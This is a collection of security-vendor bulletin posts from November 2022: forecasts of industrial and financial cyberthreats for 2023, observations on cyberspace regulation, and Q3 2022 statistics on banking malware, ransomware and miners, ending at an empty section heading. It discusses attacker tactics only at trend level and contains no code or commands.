  • Despite taking as many precautions as possible, you probably will not know whether something is amiss until you see your bank account statement. So, if you are still getting paper statements, do not wait until they hit your mailbox. Get online to see if all of the charges look legitimate, and if not, contact your bank or card issuer immediately.

ICS cyberthreats in 2023 – what to expect

22 November, 2022 - 09:00

Cybersecurity incidents were plentiful in 2022, causing many problems for industrial infrastructure owners and operators. However, luckily, we did not see any sudden or catastrophic changes in the overall threat landscape – none that were difficult to handle, despite many colorful headlines in the media.

As we see it, the coming year looks to be much more complicated. Many people may be surprised by unexpected twists and turns, though we should already be examining these eventualities today. Below we share some of our thoughts on potential developments of 2023, though we cannot claim to be providing either a complete picture or a high degree of precision.

As we analyze the events of 2022, we must profess that we have entered an era where the most significant changes in the threat landscape for industrial enterprises and OT infrastructures are mostly determined by geopolitical trends and the related macroeconomic factors.

Cybercriminals are naturally cosmopolitan; however, they do pay close attention to political and economic trends as they chase easy profits and ensure their personal safety.

APT activity, which is traditionally ascribed to intelligence agencies of various governments, always occurs in line with developments in foreign policy and the changing goalposts inside countries and inter-governmental blocs.

Developments in the APT world

Internal and external political changes will deliver new directions for APT activity.

Changes in attack geography

Attack geography will inevitably change following transformations of existing and the emergence of new tactical and strategic alliances. As alliances shift, we see cybersecurity tensions arise between countries where such tensions had never existed. Yesterday’s allies become today’s targets.

Changes in industry focus

We are going to see APT activity change the focus on specific industries very soon because the evolving geopolitical realities are closely intertwined with economic changes. Therefore, we should soon see attacks targeting the following sectors representing the real economy:

  • Agriculture, manufacturing of fertilizers, agricultural machinery and food products – all as a result of upcoming food crises and shifting food markets;
  • Logistics and transport (including transportation of energy resources) due to the on-going changes in global logistics chains;
  • The energy sector, mining and processing of mineral resources, non-ferrous and ferrous metallurgy, chemical industry, shipbuilding, instrument and machine-tool manufacturing, as the availability of these companies’ products and technologies is part of the foundation for the economic security of both individual countries and political alliances;
  • The alternative energy sector, specifically where it is on the geopolitical agenda;
  • High-tech, pharmaceuticals and medical equipment producers, since these are integral for ensuring technological independence.

Continuing attacks on traditional targets

Naturally, we will still see APT attacks on traditional targets, with the main APT attack focus definitely including:

  • enterprises in the military industrial complex, with geopolitical tensions, confrontations escalating to red alert status, along with the rising possibilities of military confrontations being the main drivers for the attackers;
  • the government sector – we expect attacks to focus on information gathering regarding government initiatives and projects related to the growth of industrial sectors of the economy;
  • critical infrastructure – attacks aiming to gain a foothold for future use, and sometimes, for instance when conflicts between specific countries are in the “hot” phase, the goal may even be to inflict immediate and direct damage.

Other changes in the threat landscape

Other important changes in the threat landscape which we already see and which we believe will increasingly contribute to the overall picture include the following:

  • A rising number of hacktivists “working” to internal and external political agendas. These attacks will garner more results – quantity will begin to morph into quality.
  • A growing risk of volunteer ideologically and politically motivated insiders, as well as insiders working with criminal (primarily ransomware) and APT groups – both at enterprises and among technology developers and vendors.
  • Ransomware attacks on critical infrastructure will become more likely – either under the auspices of hostile countries, or in countries that are unable to respond effectively, whether by attacking the adversary’s infrastructure or by conducting a full-blown investigation that leads to a court case.
  • Cybercriminals’ hands will be untied by degrading communications between law enforcement agencies from different countries and international cooperation in cybersecurity grinding to a halt, enabling threat actors to freely attack targets in ‘hostile’ countries. This applies to all types of cyberthreats and is a danger for enterprises in all sectors and for all types of OT infrastructure.
  • Criminal credential harvesting campaigns will increase in response to the growing demand for initial access to enterprise systems.

Risk factors due to geopolitical ebb and flow

The current situation forces industrial organizations into making an extremely complicated choice – which products and from which vendors should they be using and why.

On the one hand, we are seeing failing trust relationships in supply chains for both products and services (including OEM), which in turn increases the risks in using many of the products companies are used to:

  • It becomes more difficult to deploy security updates when vendors end support for products or leave the market.
  • The same applies to the degrading quality of security solutions whose regular updates cease because the security vendor has left the market.
  • We cannot totally rule out the possibility of political pressure being applied to weaponize products, technologies and services of some minor market players. When it comes to global market leaders and respected vendors, however, we believe this to be extremely unlikely.

On the other hand, searching for alternative solutions can be extremely complicated. Products from local vendors, whose secure development culture, as we have often found, is usually significantly inferior to that of global leaders, are likely to have ‘silly’ security errors and zero-day vulnerabilities, rendering them easy prey for both cybercriminals and hacktivists.

Organizations based in countries where the political situation does not require addressing the above issues should still consider the risk factors which affect everyone:

  • The quality of threat detection decreases as IS developers lose some markets, resulting in the expected loss of some of their qualified IS experts. This is a real risk factor for all security vendors experiencing political pressure.
  • The communication breakdowns between IS developers and researchers located on opposite sides of the new ‘iron curtain’ or even on the same side (due to increased competition on local markets) will undoubtedly decrease the detection rates of security solutions that are currently being developed.
  • Decreasing CTI quality – unfounded politically motivated cyberthreat attribution, exaggerated threats, lower statement validity criteria due to political pressure and in an attempt to utilize the government’s political narrative to earn additional profits.
  • Government attempts to consolidate information about incidents, threats and vulnerabilities and to limit access to this information detract from overall awareness, since information may sometimes be kept under wraps without good reasons.

    And at the same time, this results in an increased risk of confidential data leaks (example: PoC of an RCE published by mistake in a national vulnerability database). This issue could be addressed by building broad cybersecurity capacity in the public sector to ensure that responsible treatment of sensitive cybersecurity information and efficient coordinated vulnerability disclosure can always be guaranteed.

  • Additional IS risks due to the growing role of governments in the operations of industrial enterprises, including connections to government clouds and services, which may sometimes be less protected than some of the best private ones.

Additional technical and technological risk factors

  • Digitalization in a race for higher efficiency – IIoT and SmartXXX (including predictive maintenance systems and digital twin technology) leads to significantly increased attack surfaces. This is confirmed by the attack statistics on CMMS (Computerized Maintenance Management Systems).

    Top 10 countries ranked by the percentage of CMMS attacked in H1 2022:

    It is significant that in this Top 10 ranking by the percentage of attacked CMMS in H1 2022 we see the traditionally ‘secure’ countries which are not seen in rankings based on the overall percentage of OT computers attacked in the country or based on the percentage of attacked OT computers by sector.

  • Rising energy carrier prices and the resulting rises in hardware prices, on the one hand, will force many enterprises to abandon plans to deploy on premise infrastructure in favor of cloud services from third party vendors (which increases IS risks). In addition, this will negatively impact budgets allocated for IT/OT security.
  • The deployment of various unmanned vehicles and units (trucks, drones, agricultural equipment and so forth), which can be abused as either targets or tools for attacks.

Most noteworthy techniques and tactics in future attacks

Let’s not indulge in any fantastic suppositions about tactics and techniques used by the most advanced attackers, such as APTs connected to intelligence agencies in leading countries, as we can then be waylaid by unexpected twists and turns. Let’s also not discuss the tactics and techniques used by the numerous threat actors at the other end of the spectrum – the least qualified ones, since it is unlikely that they will come up with something interesting or new, and the security solutions already in place at most organizations can effectively block their attacks.

Let’s focus instead on the middle of the spectrum – the techniques and tactics used by the more active APT groups, whose activity is usually ascribed as being in line with the interests of countries in the Middle East and the Far East, as well as being used by more advanced cybercriminals, such as ransomware gangs.

Based on our experience of investigating such attacks and the related incidents, we believe that ICS cybersecurity specialists need to focus on the following tactics and techniques:

  • Phishing pages and scripts embedded on legitimate sites.
  • The use of Trojanized “cracked” distribution packages, “patches” and key generators for commonly used and specialist software (this will be stimulated by rising license costs and the departure of vendors from certain markets due to political pressure).
  • Phishing emails about current events with especially dramatic subjects, including events the root causes of which are political in nature.
  • Documents stolen in previous attacks on related or partner organizations being used as bait in phishing emails.
  • The distribution of phishing emails disguised as legitimate work correspondence via compromised mailboxes.
  • N-day vulnerabilities – these will be closed even more slowly as security updates for some solutions will become less accessible.
  • Exploiting foolish configuration errors (such as failing to change default passwords) and zero-day vulnerabilities in products from ‘new’ vendors, including local ones. Mass rollouts of such products are inevitable, despite the serious doubts about the developers’ security maturity.

For instance, recommendations such as “enter password xyz in the password field” can be found in installation instructions and user manuals in a surprising number of products from small ‘local’ vendors. Furthermore, you will rarely find information about vulnerabilities inherited from common components and OEM technologies on such vendors’ websites.

  • Exploiting inherent security flaws in cloud services from ‘local’ service providers and government information systems (see above).
  • Exploiting configuration errors in security solutions. This includes the possibility of disabling an antivirus product without entering an administrator password (antivirus is almost useless if an attacker can easily disable it). Another instance would be the weak security of the IS solution centralized management systems. In this case, IS solutions are not only easy to bypass, but they can also be used to move laterally – for instance to deliver malware or to gain access to ‘isolated’ network segments and to bypass access control rules.
  • Using popular cloud services as CnC – even after an attack is identified, the victim might still be unable to block it because important business processes could depend on the cloud.
  • Exploiting vulnerabilities in legitimate software, for instance, using DLL Hijacking and BYOVD (Bring Your Own Vulnerable Driver) to bypass endpoint security solutions.
  • Distributing malware via removable media to overcome air gaps, in those instances where air gaps actually do exist.

Some final thoughts

When writing about potential future issues, we did not aim to describe a full set of potential threats. Instead, we attempted to convey the impression of a global character of upcoming developments and to encourage our readers to assess those issues (including similar ones not mentioned specifically in this paper) which are most relevant to their organization.

We included only those developments and described only those risks which we believe to be most widespread and generally applicable to many organizations in many countries. Therefore, we kept the predictions less specific on purpose.

Only you can determine which threats are relevant for you. Naturally, if you need some assistance with this rather complicated task, we are always ready to help.

Our predictions are the sum of the opinions of our entire team based on our collective experience in researching vulnerabilities and attacks and investigating incidents, as well as our personal vision of the main vectors driving changes in the threat landscape. We will be very glad if any of our negative predictions do not come true in 2023.

We are always happy to discuss our ideas and we welcome your questions at ics-cert@kaspersky.com.

Policy trends: where are we today on regulation in cyberspace?

22 November, 2022 - 09:00

This is the first edition of our policy analysis and observations of trends in the regulation of cyberspace, and cybersecurity, within the Kaspersky Security Bulletin.

This year so far has been very challenging: increased tensions in international relations have had a huge impact on both cyberspace and cybersecurity. Further to this, we share below our key observations regarding the trends we believe have been the highlights of this year and have the potential to shape the future of cyberspace in the year ahead.

#1 Fragmentation shifting to polarization: governments and multistakeholder communities are all the more divided — and have formed into groups based on like-mindedness

The previously observed and discussed fragmentation of cyberspace on the whole — and the internet in particular (also referred to as the “splinternet” or the balkanization of the internet) — is taking on a new form. In the past we observed the first signs of governments’ diverging views on how cyberspace and cybersecurity should be regulated. Although by no means all governments stepped into this arena, the few countries that did managed to establish initial laws with extraterritorial effect (such as the EU’s GDPR, which established extraterritorial requirements for many organizations outside the EU) that produced a far larger impact beyond their national borders.

The year 2022, however, has overhauled the existing fragmentation: it does still exist, but only among the emerging alliances of the like-minded, covering not only governments but also non-state actors. The war in Ukraine has further deepened polarization between different groups of states and communities. The biggest challenge stems from the IT security community (which traditionally sticks together and is supposed to act as “neutral firefighters” in cyberspace) splitting into separate closed groups as well. For example, the global Forum of Incident Response and Security Teams (FIRST) suspended all member organizations originating from Russia or Belarus, thereby undermining the fundamental principle of trust in cybersecurity. Such a decision also prevents further threat information exchange between those in charge of responding to cyberincidents. Perhaps naturally, this has triggered talk among those left out regarding launching their own alternative communities.

The growing polarization in cyberspace poses a security risk for many of us, given the borderless nature of the threats and incidents we face. Even when the initial intention of threat actors is to target a particular organization, this can easily spill over to many others in ICT supply chains, going far beyond the initial target (as already occurred with, for example, WannaCry). Will organizations from different jurisdictions be able to exchange threat information with each other, and will they be able to cooperate across borders for incident response? Some of them will, but overall more and more barriers are emerging to this, creating security risks.

#2 Tech localization and “digital sovereignty” is no longer just about data

Globalization is still with us in 2022, but it’s becoming less popular: there’s a move toward buying local or domestic products because it could be safer. Unfortunately, cyberspace and the tech sector have already become one more arena for economic and geostrategic competition among states, while vaguely-defined (most likely intentionally so) concepts about “digital sovereignty”, “data sovereignty”, “strategic autonomy”, etc. are discussed more in different communities — from decision-makers to the media. Though initially perceived as attempts by governments to regulate and protect data (after the first data localization laws appeared), this now has the potential to affect far more areas, including microchip and other hardware manufacturing and software development. In some critical sectors of cybermature jurisdictions this already exists: mostly domestic companies are preferred for procurement. But could it expand further into the consumer market?

If so, in a global context, widespread application of data localization rules in particular would most likely create challenges for cybersecurity (i.e., for better and more effective threat intelligence to fight cyberthreats). With less visibility into the cyberthreat landscape, the lower the chances of developing effective detection tools or producing high-quality threat intelligence. These risks will increase if more and more countries impose data localization rules on their markets.

Thus, a dilemma could arise where attempts to provide more cybersecurity through strengthening data security, on the one hand, may actually lead to weaker cybersecurity (from less visibility and threat intelligence), on the other. The solution could lie in developing smart regulation approaches as well as defining clear security criteria for vendors to be trusted enough for cyberthreat-related data processing.

#3 Do cyberdiplomacy and international cybersecurity still exist? If so, they’ve taken a back seat this year

Kaspersky has been actively involved in many multistakeholder initiatives to advance cyberdiplomacy, including at the UN and regional levels. Subjectively speaking, 2022 has seen the discussion of cyberdiplomacy and international cybersecurity become less widespread and profound. What does this mean? The war in Ukraine and ongoing tensions in international relations have placed onto the agenda issues about security in its conventional sense, where cyber is just one of its aspects. What will happen next is hard to predict, but if military action continues, cyberdiplomacy will most likely stay firmly in the back seat; however, it is to be hoped that it won’t disappear completely.

#4 Full-blown cyberwar hasn’t occurred, and this is of course good news. But we seem to be facing a more complex challenge — hybrid operations

Cyber Armageddon hasn’t occurred. Though many experts predicted it, it hasn’t materialized in the current war in Ukraine. This is good news, for sure. At the same time, unfortunately, the unfolding events have shown that cyberweapons are being used in the conflict to create hybrid warfare, where actions take place both in the digital realm (including with data manipulation and misinformation operations) and on the ground. The challenge is that the international community hasn’t developed clear responses to deal with this, and most likely any technological and technical solutions will be insufficient.

#5 Liability of digital products: a new area in future regulatory efforts

Safety and security labels don’t exist yet for software. And where a vulnerability may create security or safety risks, users may wonder whom to reach out to for liability issues. So far, different vertical legislative approaches do provide solutions for consumers, such as personal data protection laws for cases where personal data has been affected. The financial and banking sector is well-regulated too. But what about a mass-market photo-editing app that can be exploited by stalkerware? Should the developer be responsible? Some jurisdictions apparently already have the answer. The EU — as a norm-setter — has been among the first to propose a game-changing draft law titled the Cyber Resilience Act, with proposed fines as high as those in the GDPR. And in the U.S. there have been some first attempts to define baseline criteria for cybersecurity labeling of consumer software, as discussed in a separate blog post. Most likely, next year and beyond, other governments will find the regulation of software development liability a good idea, and we could well see even further fragmentation as a result of the different approaches taken among states.

Crimeware and financial cyberthreats in 2023

22 November, 2022 - 09:00

A look back on the year 2022 and what to expect in 2023

Every year, as part of the Kaspersky Security Bulletin, we predict the major trends that attackers targeting financial organizations will follow in the coming year. The predictions, based on our extensive experience, help individuals and businesses improve their cybersecurity and prevent the vast range of possible risks.

As the financial threat landscape has been dramatically evolving over the past few years, with the expansion of such activities as ransomware or cryptofraud, we believe it is no longer sufficient to look at the threats to traditional financial institutions (like banks), but rather assess financial threats as a whole. The cybercriminal market has been developing extensively, with the overwhelming majority of cybercriminals pursuing one goal — financial profit, no matter the source. However, the way they do it varies from year to year, and understanding the changes in their tactics and tools can help organizations improve their security.

This year, we have decided to adjust our predictions accordingly, expanding them to encompass crimeware developments and financial cyberthreats as a whole.

This report assesses how accurately we predicted the developments in the financial threat landscape in 2022 and considers what to expect in 2023.

Analysis of forecasts for 2022

  • Rise and consolidation of information stealers. Our telemetry shows an exponential growth in infostealers in 2021. Given the variety of offers, low costs, and effectiveness, we believe this trend will continue. Additionally, they might even be used as bulk collectors for targeted and more complex attacks.

    Yes. While we haven’t seen exponential growth in the use of stealers, their advancement and evolution has been very noticeable. In 2022, we uncovered some new malicious families actively sold on dark markets, such as Rhadamanthys, BlueFox, and Parrot, stealing sensitive information from the victims’ devices. One of the most striking new stealers has been OnionPoison. Unlike common stealers, this malware gathered data that can be used to identify the victims, such as browsing histories, social networking account IDs and Wi-Fi networks. Previously discovered stealers have not been left behind. This year we observed the updates of the AcridRain and Raccoon stealers, and the remarkable evolution of the RedLine stealer, making it a self-spreading threat that attacks gamers via YouTube. Also of note in 2022 are campaigns impersonating well-known software brands like Notepad++. The trend remains solid, and these types of campaigns impact a large number of users, hitting the target brand’s bottom line. Moreover, the ransomware gang RansomEXX also abuses open source software by recompiling it to load a malicious shellcode; Notepad++ was also used in one of their attacks.

    While there are still top-level threats that are not distributed openly, the vast majority of stealers have become more affordable and cheaper for average cybercriminals, making this threat more likely to evolve even more in the following year.

  • Cryptocurrency targeted attacks. The cryptocurrency business continues to grow, and people continue to invest their money in this market because it’s a digital asset and all transactions occur online. It also offers anonymity to users. These are attractive aspects that cybercrime groups will be unable to resist. And not only cybercrime groups, but also state-sponsored groups who have already started targeting this industry. After the Bangladesh bank heist, the BlueNoroff group is still aggressively attacking the cryptocurrency business, and we anticipate this activity will continue.

    Despite these uncovered campaigns, attackers were still more likely to hunt for cryptocurrency using phishing, offering dubious cryptocurrency exchange platforms, and launching cryptojacking to illicitly mint cryptocurrency. Previously, mining was mostly a threat for general users, but today miners are stealing power from large businesses and critical infrastructures. Even big ransomware operators, for example, AstraLocker, are shutting down their operations to switch to cryptojacking.

  • More cryptocurrency-related threats: fake hardware wallets, smart contract attacks, DeFi hacks, and more. In the scramble for cryptocurrency investment opportunities, we believe that cybercriminals will take advantage of fabricating and selling rogue devices with backdoors, followed by social engineering campaigns and other methods to steal victims’ financial assets.

    Yes. In 2022, we observed many other cryptocurrency-related threats potentially costing users millions of dollars. Since the start of 2022, cybercriminals have stolen $3 billion from DeFi protocols, with 125 crypto hacks in total. According to the freshest data on DeFi, every hour 15 newly deployed scams against smart contracts are detected. At this rate, 2022 will likely surpass 2021 as the biggest year for hacking on record. The lack of state-of-the-art security for smart contracts leads to attacks on these platforms and, based on how the business model works, the potential theft of a lot of money.

  • Targeted ransomware — more targeted and more regional. With the international efforts to crack down on major targeted ransomware groups, we will see a rise in small, regionally derived groups focused on local The adoption of Open Banking in more countries may lead to more opportunities for cyberattacks.

    Yes. We’ve observed a rise in the number of targeted and regional ransomware attacks. One of the reasons why ransomware attacks have become more regional is the decrease in collaboration between ransomware groups. In the past, many actors would join forces to attack and encrypt as many organizations around the world as possible. But thanks to international efforts, such as No More Ransom, to crack down on their work, global attacks have become much rarer.

    Interestingly, this trend was also influenced by geopolitical conflict, which we did not anticipate last year. Many ransomware groups took sides in the conflict between Russia and Ukraine, focusing their activities on destructive attacks or limiting the range of their targets by geography. The most significant reaction of all was likely by the Conti ransomware group, who announced that it would retaliate with full capabilities against any “enemy’s” critical infrastructure if Russia became a target of cyberattacks. On the other side, Kaspersky discovered Freeud, a wiper under the guise of ransomware whose creators proclaimed support for Ukraine.

  • Access broker specialists — professionalize access to compromised networks. Instead of major efforts to compromise access to a corporate or public entity, we can expect Ransomware-as-a-Service operators to seek to buy access to another cybercriminal group that already has access to the target, focusing their activity on ransomware deployment.

    Yes. Attackers have indeed resorted to buying initial access to compromised services more often than hacking it themselves. This has become a real stand-alone business on the dark web (Malware-as-a-Service, MaaS). This year we detected a malicious spam campaign targeting organizations that grew tenfold in a month, spreading Emotet malware, which is used by Conti ransomware affiliates to gain initial access. Once access is obtained, the organization is placed into a pool of potential ransomware targets. This growth in the Emotet campaign suggests that Access-as-a-Service continues to be actively used by cybercriminal groups, and the trend of hiring access broker specialists is likely to continue in 2023.

  • Mobile banking Trojans on the rise. As mobile banking experienced booming adoption worldwide due to the pandemic (in Brazil it represented 51% of all transactions in 2020), we can expect more mobile banking Trojans for Android, especially RATs that can bypass security measures adopted by banks (such as OTP and MFA). Regional Android implant projects will move globally, exporting attacks to Western European countries.

    Yes. Security remains the biggest problem for users who want to make regular mobile payments. As predicted, the number of mobile banking Trojan detections increased considerably in 2022 worldwide compared to the last year, reaching more than 55,000 attacks in the second quarter of 2022 alone. With the rising number of attacks, cybercriminals have evolved new banking Trojans, targeting mobile users. In 2022, Kaspersky researchers have so far discovered more than 190 applications distributing Harly Trojan with more than 4.8 million downloads. While these apps were available in official stores and disguised as legitimate apps, the fraudsters behind them subscribed unsuspecting users to unwanted paid services.

  • Rise of threat to online payment systems. Amid the pandemic, many companies went digital and moved their systems online. And the longer people stay at home because of quarantine and lockdowns, the more they rely on online markets and payment systems. However, this rapid shift is not accompanied by the appropriate security measures, and it is attracting lots of cybercriminals. This issue is particularly severe in developing countries, and the symptoms will last for a while.

    No. This year, we have not observed a lot of new fintech players that went big and which could become new targets for cybercriminals.

  • With more fintech apps out there, the increasing volume of financial data is attracting cybercriminals. Thanks to online payment systems and fintech applications, large amounts of important personal information is stored on mobile. Many cybercrime groups will continue to attack personal mobile phones with evolved strategies such as deep fake technology and advanced malware to steal victims’ data.

    No. Mobile malware techniques haven’t changed much in the course of 2022.

  • Remote workers using corporate computers for entertainment purposes, such as online games, continue to pose financial threats to organizations. In a previous post, we wrote that users rely on corporate laptops to play video games, watch movies, and use e-learning platforms. This behavior was easy to identify because there was a boom in the Intel and AMD mobile graphics card market in 2020-2021 compared to previous years. This trend is here to stay, and while during 2020 46% of employees had never worked remotely before, now two-thirds of them state they wouldn’t go back to the office, with the rest claiming to have a shorter office work week.

    Yes. The level of cybersecurity after the pandemic and the initial adoption of remote work by organizations en masse has become better. Nevertheless, corporate computers used for entertainment purposes remain one of the most important ways to get initial access to a company’s network. Looking for alternative sources to download an episode of a show or a newly released film, users encounter various types of malware, including Trojans, spyware and backdoors, as well as adware. According to Kaspersky statistics, 35% of users who faced threats under the guise of streaming platforms were affected by Trojans. If such malware ends up on a corporate computer, attackers could even penetrate the corporate network and search for and steal sensitive information, including both business development secrets and employees’ personal data.

  • ATM and PoS malware to return with a vengeance. During the pandemic, some locations saw PoS (point of sale) and ATM transaction levels drop significantly. Lockdowns forced people to stay at home and make purchases online, and this was mirrored in PoS/ATM malware too. As restrictions are lifted, we should expect the return of known PoS/ATM malware and the appearance of new projects. Cybercriminals will regain their easy physical access to ATMs and PoS devices at the same time as customers of retailers and financial institutions.

    Yes. As predicted, with the lift of COVID-19 restrictions, attackers have stepped up their activities again in 2022. In the first eight months of the year, the number of unique devices affected by ATM/PoS malware grew by 19% as compared to the same period in 2020, and by nearly 4% compared to 2021. Kaspersky researchers have also discovered cybercriminals creating and deploying new never-seen-before tools targeting ATM and PoS devices. For instance, the Prilex threat group, famous for stealing millions of dollars from banks, has evolved substantially. Specifically, Prilex has upgraded its tools from a simple memory scraper to an advanced and complex malware that now targets modular PoS terminals and is the first malware able to clone credit card transactions, even those protected by CHIP and PIN.

    Perhaps one of the biggest shifts is PoS malware becoming a service sold on the dark web, which means it is now available to other cybercriminals, and the risk of losing money is increasing for businesses worldwide.

Forecasts for 2023

Led by gaming and other entertainment sectors, Web3 continues to gain traction and so will threats for it

With the increasing popularity of cryptocurrencies, the number of crypto scams has also increased. However, we believe that users are now much more aware of crypto and will not fall for primitive scams, such as a video featuring an Elon Musk deepfake promising huge returns in a dodgy cryptocurrency investment scheme that went viral. Cybercriminals will continue to try to steal money through fake ICOs and NFTs along with other cryptocurrency-based financial theft (like exploitation of vulnerable smart contracts), but will make them more advanced and widespread.

Malware loaders to become the hottest goods on the underground market

Many actors have their own malware, but that alone is not enough. Entire samples used to consist solely of ransomware, but the more diverse the modules in a piece of ransomware, the better it will evade detection. As a result, attackers are now paying much more attention to downloaders and droppers, which can avoid detection. This has become a major commodity in the MaaS industry, and there are even already favorites among cybercriminals on the dark web — the Matanbunchus downloader, for example. All in all, stealth execution and bypassing EDRs is what malicious loader developers are going to focus on in 2023.

More new “Red Team” penetration testing frameworks deployed by cybercriminals

At the same time as vendors create and improve penetration testing frameworks to protect companies, crimeware actors are expected to use them much more actively for illegal activities. The most remarkable example of this trend starting to spread globally is Cobalt Strike. The tool is so powerful that threat groups have added it to their arsenal, already using it in a wide variety of attacks and cyberespionage campaigns. In 2022, the news hit the headlines that another pentester toolkit dubbed Brute Ratel C4 had been hacked, and is now being distributed on hacker forums. We predict that, along with the development of new penetration tools, cybercriminals will increasingly use them for their own malicious purposes — and Brute Ratel C4 and Cobalt Strike are just the beginning of this trend.

Ransomware negotiations and payments begin to rely less on Bitcoin as a transfer of value

As sanctions continue to be issued, the markets become more regulated, and technologies improve at tracking the flow and sources of Bitcoin, cybercrooks will rotate away from this cryptocurrency toward other forms of value transfer.

Ransomware groups following less financial interest, but more destructive activity

Perhaps a surprising prediction in a report about future financial threats, yet ransomware has been one of the biggest threats in recent years, inflicting massive financial damage on organizations. As the geopolitical agenda increasingly occupies the attention not only of the public but also of cybercriminals, we expect ransomware groups to make demands for some form of political action, instead of demands for ransom money. One of such examples is Freeud, a brand-new ransomware with wiper capabilities.

IT threat evolution in Q3 2022. Non-mobile statistics

18 November, 2022 - 09:10

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

  • Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
  • Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.
  • Ransomware attacks were defeated on the computers of 72,941 unique users.
  • Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.
Financial threats

Number of users attacked by banking malware

In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.

Number of unique users attacked by financial malware, Q3 2022 (download)

TOP 10 banking malware families

     Name                 Verdicts                              %*
  1  Ramnit/Nimnul        Trojan-Banker.Win32.Ramnit            33.2
  2  Zbot/Zeus            Trojan-Banker.Win32.Zbot              15.2
  3  IcedID               Trojan-Banker.Win32.IcedID            10.0
  4  CliptoShuffler       Trojan-Banker.Win32.CliptoShuffler    5.8
  5  Trickster/Trickbot   Trojan-Banker.Win32.Trickster         5.8
  6  SpyEye               Trojan-Spy.Win32.SpyEye               2.1
  7  RTM                  Trojan-Banker.Win32.RTM               7.9
  8  Danabot              Trojan-Banker.Win32.Danabot           1.4
  9  Tinba/TinyBanker     Trojan-Banker.Win32.Tinba             1.4
 10  Gozi                 Trojan-Banker.Win32.Gozi              1.1

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of financial malware attacks

TOP 10 countries and territories by share of attacked users

     Country or territory*   %**
  1  Turkmenistan            4.7
  2  Afghanistan             4.6
  3  Paraguay                2.8
  4  Tajikistan              2.8
  5  Yemen                   2.3
  6  Sudan                   2.3
  7  China                   2.0
  8  Switzerland             2.0
  9  Egypt                   1.9
 10  Venezuela               1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Ransomware programs

Quarterly trends and highlights

The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, leaked online. LockBit themselves attributed the leakage to one of their developers’ personal initiative, not the group’s getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy spotted back in May. A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.

Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The former threatened files accessible from the internet over the SMB protocol and protected by a weak account password. The latter attacked devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.

The United States Department of Justice announced that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely used by the North Korean operators Andariel. The DOJ said victims had started getting their money back.

The creators of the little-known AstraLocker and Yashma ransomware published decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.

Number of new modifications

In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.

Number of new ransomware modifications, Q3 2021 — Q3 2022 (download)

Number of users attacked by ransomware Trojans

In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q3 2022 (download)

Geography of attacked users

TOP 10 countries and territories attacked by ransomware Trojans

     Country or territory*   %**
  1  Bangladesh              1.66
  2  Yemen                   1.30
  3  South Korea             0.98
  4  Taiwan                  0.77
  5  Mozambique              0.64
  6  China                   0.52
  7  Colombia                0.43
  8  Nigeria                 0.40
  9  Pakistan                0.39
 10  Venezuela               0.32

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 most common families of ransomware Trojans

     Name                 Verdicts*                                                      Percentage of attacked users**
  1  (generic verdict)    Trojan-Ransom.Win32.Encoder                                    14.76
  2  WannaCry             Trojan-Ransom.Win32.Wanna                                      12.12
  3  (generic verdict)    Trojan-Ransom.Win32.Gen                                        11.68
  4  Stop/Djvu            Trojan-Ransom.Win32.Stop                                       6.59
  5  (generic verdict)    Trojan-Ransom.Win32.Phny                                       6.53
  6  (generic verdict)    Trojan-Ransom.Win32.Crypmod                                    5.46
  7  Magniber             Trojan-Ransom.Win64.Magni                                      4.93
  8  PolyRansom/VirLock   Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom        4.84
  9  (generic verdict)    Trojan-Ransom.Win32.Instructions                               4.35
 10  Hive                 Trojan-Ransom.Win32.Hive                                       3.87

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data.
** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans.

Miners

Number of new miner modifications

In Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June’s figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.

Number of new miner modifications, Q3 2022 (download)

Number of users attacked by miners

In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.

Number of unique users attacked by miners, Q3 2022 (download)

Geography of miner attacks

TOP 10 countries and territories attacked by miners

     Country or territory*   %**
  1  Ethiopia                2.38
  2  Kazakhstan              2.13
  3  Uzbekistan              2.01
  4  Rwanda                  1.93
  5  Tajikistan              1.83
  6  Venezuela               1.78
  7  Kyrgyzstan              1.73
  8  Mozambique              1.57
  9  Tanzania                1.56
 10  Ukraine                 1.54

* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by criminals during cyberattacks

Quarterly highlights

